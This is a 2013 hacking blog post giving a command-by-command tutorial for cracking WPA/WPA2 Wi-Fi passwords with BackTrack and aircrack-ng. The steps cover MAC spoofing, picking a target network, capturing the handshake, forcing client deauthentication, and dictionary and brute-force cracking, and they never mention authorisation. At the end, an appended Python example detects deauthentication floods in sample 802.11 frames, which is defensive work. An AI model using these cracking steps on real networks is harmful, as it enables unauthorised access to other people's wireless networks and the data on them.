Wednesday, April 17, 2013

Hacking WPA/WPA2 using BackTrack


*Note* – Before you begin, make sure that your wireless card supports packet injection; otherwise this tutorial will not work.
Step 1 – Boot into BackTrack 5
Step 2 – Open a Terminal window, the command-line utility built into BackTrack 5. It is the black box on the top menu (if you’re using the Gnome version of BackTrack).
Step 3 – Enter the following commands into the command line:
  • airmon-ng stop wlan0
  • ifconfig wlan0 down
  • macchanger --mac 00:11:22:33:44:55 wlan0
  • airmon-ng start wlan0
These commands stop the wireless interface so that you can change the MAC address of your wireless card (in this case we are changing it to 00:11:22:33:44:55) and restart the card using the new MAC address.
Step 4 – We will run airodump-ng on the monitor-mode interface; this will allow us to see all of the wireless networks around us.
  • airodump-ng mon0 
Step 5 – Choose the network you want to hack and take note of the BSSID, the channel it is on, and the ESSID.
*Note* – The PWR value has to be fairly high to be able to hack it; it is determined by how close you are to the wireless router. The closer you are, the better.
Step 6 – Once you have chosen your target enter the following commands:
  • airodump-ng mon0 --channel * --bssid **:**:**:**:**:** -w filename
This will capture packets and write them to the “filename” capture file. What we are trying to capture here is the handshake between the router and the wireless client, which gives us what we need to crack the key.
Once “WPA handshake: **:**:**:**:**:**” appears in the top right-hand corner we can move on. If you are having trouble getting the WPA handshake to occur, proceed to Step 7; otherwise continue to Step 8.
Step 7 – Enter the command below to deauthenticate a wireless client so that it re-establishes its connection and generates a new handshake to capture. This step ends once you have captured the handshake.
  • aireplay-ng -0 1 -a **:**:**:**:**:** -c **:**:**:**:**:** mon0 
Step 8 – Now we will try to crack the password in “filename.cap” using a list of words, here called “wordlist.lst” (you can download a good 200 million word dictionary here).
  • aircrack-ng -w wordlist.lst -b **:**:**:**:**:** filename.cap
Your computer has to compute the hash value of every password in that list, but a computer can go through those 200 million passwords in 6-12 hours.
Step 9 – If the password isn’t found in the dictionary, you can try to brute-force the password with this command (note that this could take a very long time depending on the password strength):
  • /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b **:**:**:**:**:** -w - filename.cap
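From the defender's side, the deauthentication burst that Step 7 relies on is itself an easy signal to spot in a monitor-mode capture. The following is an added example, not part of the original post: it parses raw 802.11 management frames and flags any BSSID that sends many deauth/disassoc frames within a short window. The frames, MAC addresses and reason codes are constructed sample data, and the 1-second window and 10-frame threshold are assumptions.

```python
import struct
from collections import defaultdict

# 802.11 management frame subtypes (frame type 0)
SUBTYPE_BEACON, SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 8, 10, 12
KICK_SUBTYPES = (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH)   # frames that knock a client off the AP

def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_mgmt(frame):
    """Return (subtype, dst, src, bssid, reason) for a raw 802.11 management frame, else None."""
    if len(frame) < 24 or (frame[0] >> 2) & 0x3 != 0:   # type bits of frame control must be 0
        return None
    subtype = frame[0] >> 4
    dst, src, bssid = (mac_str(frame[i:i + 6]) for i in (4, 10, 16))   # addr1, addr2, addr3
    # deauth/disassoc bodies begin with a little-endian 16-bit reason code
    reason = struct.unpack("<H", frame[24:26])[0] if subtype in KICK_SUBTYPES and len(frame) >= 26 else None
    return subtype, dst, src, bssid, reason

def build_mgmt(subtype, dst, src, bssid, seq=0, body=b""):
    """Constructed test frame: frame control, duration, addr1-3, sequence control, body."""
    hdr = bytes([subtype << 4, 0x00]) + b"\x00\x00"
    hdr += b"".join(bytes.fromhex(a.replace(":", "")) for a in (dst, src, bssid))
    return hdr + struct.pack("<H", seq << 4) + body

def detect_deauth_flood(frames, window=1.0, threshold=10):
    """frames: iterable of (timestamp_s, raw_bytes) -> [(bssid, window_start, count)] alerts."""
    per_bssid = defaultdict(list)
    for ts, raw in frames:
        p = parse_mgmt(raw)
        if p and p[0] in KICK_SUBTYPES:
            per_bssid[p[3]].append(ts)
    alerts = []
    for bssid, times in per_bssid.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:   # >= threshold kicks inside one window
                alerts.append((bssid, times[start], end - start + 1))
                break                           # one alert per BSSID is enough
    return alerts

# Constructed sample capture: 20 beacons, a 32-frame deauth burst from AP, one isolated deauth.
AP, STA, OTHER_AP = "02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:03"
SAMPLE = [(i * 0.1, build_mgmt(SUBTYPE_BEACON, "ff:ff:ff:ff:ff:ff", AP, AP, seq=i)) for i in range(20)]
SAMPLE += [(5 + i * 0.01, build_mgmt(SUBTYPE_DEAUTH, STA, AP, AP, seq=i, body=struct.pack("<H", 7))) for i in range(32)]
SAMPLE.append((9.0, build_mgmt(SUBTYPE_DEAUTH, STA, OTHER_AP, OTHER_AP, body=struct.pack("<H", 3))))
print(detect_deauth_flood(SAMPLE))   # → [('02:00:00:00:00:01', 5.0, 10)]
```

A single deauth from another BSSID (the last sample frame) is below the threshold and is not reported, which is the distinction a wireless IDS needs between a normal disconnect and a forced one.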



© Faster Hacking Tips
Designed by BlogThietKe Cooperated with Duy Pham
Released under Creative Commons 3.0 CC BY-NC 3.0